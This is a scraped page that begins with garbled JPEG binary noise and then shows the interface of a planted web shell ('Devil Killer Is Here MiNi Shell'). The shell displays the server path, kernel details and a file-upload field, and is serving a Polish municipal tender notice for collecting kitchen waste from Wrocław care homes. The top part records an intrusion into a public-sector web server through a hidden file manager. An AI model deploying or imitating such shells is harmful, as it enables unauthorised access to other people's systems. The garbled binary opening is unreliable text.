JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220105/0000651501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi transportu, odbioru i utylizacji odpadów kuchennych ulegających biodegradacji kat. III z Domów Pomocy Społecznej Miejskiego Centrum Usług Socjalnych we Wrocławiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wrocław - Miejskie Centrum Usług Socjalnych we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 932684540</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mączna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">54-131</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mcus@mcus.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mcus.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi transportu, odbioru i utylizacji odpadów kuchennych ulegających biodegradacji kat. III z Domów Pomocy Społecznej Miejskiego Centrum Usług Socjalnych we Wrocławiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3248734b-6e15-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00006515</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mcus.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mcus.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">7.<br/>Wymagania techniczne urządzeń informatycznych, niezbędnych do prawidłowego korzystania z<br/>Platformy Zakupowej, opisane zostały na stronie Platformy Zakupowej:<br/>https://mcus.logintrade.net/reg,info,wymaganiatechniczne.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula obowiązku informacyjnego wynikającego z art. 13<br/>ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) - została zawarta w SWZ Rozdziale XXII</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 19 ust. 4 ustawy Pzp Zamawiający<br/>informuje o ograniczeniach, o których mowa w art. 19 ust. 2 i 3 oraz art. 75 ustawy Pzp Zamawiający<br/>poinformował w SWZ w Rozdziale XXII ust. 2</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MCUS.DZP.373-1/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są usługi odbioru, transportu i utylizacji odpadów kuchennych<br/>ulegających biodegradacji kat. III z Domów Pomocy Społecznej Miejskiego Centrum Usług<br/>Socjalnych we Wrocławiu.<br/>2. Przedmiot zamówienia określony jest kodem CPV 90500000-2 usługi związane z odpadami,<br/>CPV 90533000-2 usługi gospodarki odpadami.<br/>3. Szczegółowy opis przedmiotu zamówienia, określający częstotliwość odbiorów oraz ilość<br/>pojemników na odpady, znajduje się w Kalkulacji cenowej (Załącznik nr 2 do SWZ) oraz Wzorze<br/>umowy (Załącznik nr 4 do SWZ), które stanowią integralną część SWZ.<br/>4. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych<br/>we Wzorze umowy stanowiącym Załącznik nr 4 do SWZ.<br/>5. Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego<br/>postępowania. Zamawiający nie dokonuje podziału zamówienia na części w ramach bieżącego<br/>postępowania i tym samym nie dopuszcza składania ofert częściowych. Podział zamówienia<br/>groziłby nadmiernymi kosztami wykonania zamówienia lub też potrzebą skoordynowania działań<br/>różnych Wykonawców realizujących poszczególne części zamówienia mogłaby poważnie<br/>zagrozić właściwemu wykonaniu zamówienia.<br/>6. Zamawiający nie dopuszcza możliwości składania ofert wariantowych, o których mowa<br/>w art. 92 ustawy Pzp.<br/>7. Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 8<br/>ustawy Pzp.<br/>8. Informacje dotyczące zatrudnienia:<br/>1) Stosownie do treści art. 95 ust. 1 ustawy Pzp, Zamawiający wymaga aby Wykonawca lub<br/>Podwykonawca w ramach realizacji niniejszego zamówienia zatrudniał na podstawie stosunku<br/>pracy osoby wykonujące czynności określone w przedmiocie zamówienia, jeżeli wykonanie tych<br/>czynności polega na wykonywaniu pracy w sposób określony w art. 22<br/>§ 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2020 r. poz. 1320);<br/>2) Zatrudnienie osób przeznaczonych do realizacji przedmiotu umowy powinno trwać od<br/>rozpoczęcia realizacji zamówienia do końca upływu terminu realizacji zamówienia, jednak w<br/>przypadku rozwiązania stosunku pracy przez pracownika lub przez pracodawcę lub w<br/>przypadku wygaśnięcia stosunku pracy (w tym z przyczyn losowych) przed zakończeniem tego<br/>okresu, Wykonawca będzie zobowiązany zatrudnić inną osobę;<br/>3) Sposób dokumentowania przez Wykonawcę zatrudnienia osób do realizacji przedmiotu<br/>umowy, odbywać się będzie poprzez ewidencjonowanie przez danego Wykonawcę czasu pracy<br/>osób ze wskazaniem czynności, które były wykonywane przez te osoby;<br/>4) Zamawiający zastrzega, że osoby zatrudnione do realizacji zamówienia nie mogą świadczyć<br/>czynności opisanych w przedmiocie zamówienia na podstawie umów cywilnoprawnych;<br/>5) W trakcie realizacji zamówienia, na każde wezwanie Zamawiającego, w wyznaczonym<br/>w tym wezwaniu terminie, Wykonawca przedłoży Zamawiającemu wskazane poniżej dowody w<br/>celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy<br/>o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących czynności z zakresu<br/>przedmiotu zatrudnienia w trakcie realizacji zamówienia:<br/>a) oświadczenie Wykonawcy lub Podwykonawcy o zatrudnieniu na podstawie umowy<br/>o pracę osób wykonujących czynności zawarte w przedmiocie zamówienia, których dotyczy<br/>wezwanie Zamawiającego (oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że<br/>objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze<br/>wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby<br/>uprawnionej do złożenia oświadczenia w imieniu Wykonawcy/ Podwykonawcy);<br/>b) poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lub Podwykonawcę<br/>kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności<br/>zawartych w przedmiocie zamówienia, których dotyczy ww. oświadczenie Wykonawcy lub<br/>Podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został<br/>sporządzony). Kopia umowy/umów powinny zostać zanonimizowana w sposób zapewniający<br/>ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o<br/>ochronie danych osobowych (tj. 2019, poz. 1781 ze zm.), tj. w szczególności bez wskazania<br/>adresów PESEL. Takie dane jak imię i nazwisko pracownika nie podlegają anonimizacji.<br/>Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być<br/>możliwe do identyfikowania. W tym celu Wykonawca zobowiązany jest do uzyskania od<br/>pracowników zgody na przetwarzanie danych osobowych zgodnie z przepisami o ochronie<br/>danych osobowych;<br/>c) zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez Wykonawcę lub<br/>podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na<br/>podstawie umów o pracę za ostatni okres rozliczeniowy;<br/>d) poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lub Podwykonawcę<br/>kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń,<br/>zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z<br/>przepisami z dnia 10 maja 2018 r. o ochronie danych osobowych;<br/>6) nieprzedłożenie przez Wykonawcę dokumentów wskazanych w pkt 5 powyżej będzie<br/>traktowane jako niespełnienie wymagań w zakresie zatrudniania osób na umowę o pracę, co<br/>będzie skutkować naliczeniem kar umownych określonych w Projekcie umowy stanowiącym<br/>Załącznik nr 4 do niniejszej SWZ;<br/>7) w trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności<br/>kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub Podwykonawcę<br/>wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących czynności określone w<br/>przedmiocie zamówienia. Zamawiający uprawniony jest w szczególności do:<br/>a) żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów i<br/>dokonywania ich oceny;<br/>b) żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww.<br/>wymogów;<br/>c) przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>8) w przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez Wykonawcę<br/>lub Podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez<br/>Państwową Inspekcję Pracy;<br/>9) Zamawiający może wypowiedzieć umowę, jeżeli Wykonawca zaprzestał zatrudniania osób<br/>wykonujących czynności określone w przedmiocie zamówienia na podstawie umowy o pracę.<br/>9. W przypadku niewywiązania się z wymagań dotyczących zatrudniania osób na podstawie<br/>umowy o pracę, Zamawiającemu przysługiwać będzie także prawo do wypowiedzenia umowy ze<br/>skutkiem natychmiastowym.<br/>10. Wykonawca zobowiązuje się zapewnić bezpieczeństwo danych osobowych dotyczących<br/>osób wykonujących przedmiot zamówienia, zgodnie z ustawą o ochronie danych osobowych.<br/>11. Wszystkie powyższe wymagania związane z realizacją przedmiotu zamówienia mają<br/>również zastosowanie wobec Podwykonawcy lub dalszego Podwykonawcy.<br/>12. Zamawiający nie wymaga odbycia wizji lokalnej przez Wykonawcę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godziny odbiorów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na<br/>podstawie art. 108 ustawy Pzp ust. 1 pkt 1-6 ustawy Pzp;<br/>2) spełniają warunki udziału w postępowaniu dotyczące posiadania uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów na<br/>podstawie art. 112 ust. 2 pkt 2 ustawy Pzp. – Wykonawca spełni ten warunek, jeżeli wykaże, że<br/>posiada:<br/>1) decyzję Inspekcji Weterynaryjnej nadającej numer identyfikacyjny na prowadzenie<br/>działalności gospodarczej polegającej na transporcie odpadów kategorii III, tj. ubocznych<br/>produktów pochodzenia zwierzęcego w tym na przewóz odpadów określonymi środkami<br/>transportu;<br/>2) decyzję na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania<br/>(przetwarzania) odpadów. W przypadku braku decyzji – kopie umowy zawartą z podmiotem,<br/>który posiada zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania<br/>odpadów (przetwarzania). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu dotyczących posiadania uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej:<br/>1) decyzję Inspekcji Weterynaryjnej nadającej numer identyfikacyjny na prowadzenie działalności<br/>gospodarczej polegającej na transporcie odpadów kategorii III, tj. ubocznych produktów pochodzenia<br/>zwierzęcego w tym na przewóz odpadów określonymi środkami transportu<br/>2) decyzję na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania (przetwarzania)<br/>odpadów. W przypadku braku decyzji – kopie umowy zawartą z podmiotem, który posiada zezwolenie<br/>na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów (przetwarzania).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Kalkulację cenową wypełnioną i podpisaną przez Wykonawcę (Załącznik nr 2 do SWZ);<br/>2) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnianiu<br/>warunków udziału w postępowaniu według wzoru stanowiącego Załącznik nr 3 do SWZ (w<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu składa każdy z<br/>Wykonawców – Wzór stanowi Załącznik nr 3 do SWZ);<br/>3) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>4) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielnie zamówienia publicznego – dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielnie zamówienia publicznego;<br/>W przypadku, o którym mowa w Rozdziale VIII ust. 14, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy (art. 117 ust. 4 Pzp). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W przypadku, o którym mowa w ust. 2, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty<br/>oryginał pełnomocnictwa opatrzony kwalifikowanym podpisem elektronicznym/ podpisem<br/>osobistym/ podpisem zaufanym przez Wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia publicznego lub kopię potwierdzoną notarialnie opatrzoną kwalifikowanym<br/>podpisem elektronicznym przez notariusza. Pełnomocnictwo powinno zawierać w szczególności:<br/>1) postępowanie o zamówienie publiczne, którego dotyczą;<br/>2) nazwy z określeniem adresu siedziby wszystkich Wykonawców ubiegających się wspólnie o<br/>udzielenie zamówienia;<br/>3) dane ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z<br/>pełnomocnikiem.<br/>W formularzu ofertowym Wykonawca zobowiązany jest wskazać (firmy) nazwy wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę<br/>musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści<br/>pełnomocnictwa załączonego do oferty- treść pełnomocnictwa musi dokładnie określać zakres<br/>umocowania.<br/>Dokumenty na potwierdzenie braku podstaw do wykluczenia będzie zobowiązany złożyć każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy (jeżeli dotyczy).<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczają spośród siebie<br/>Wykonawcę kierującego (Lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak i dla wszystkich partnerów.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia<br/>dotyczące oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum)<br/>stosuje się odpowiednio.<br/>Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> 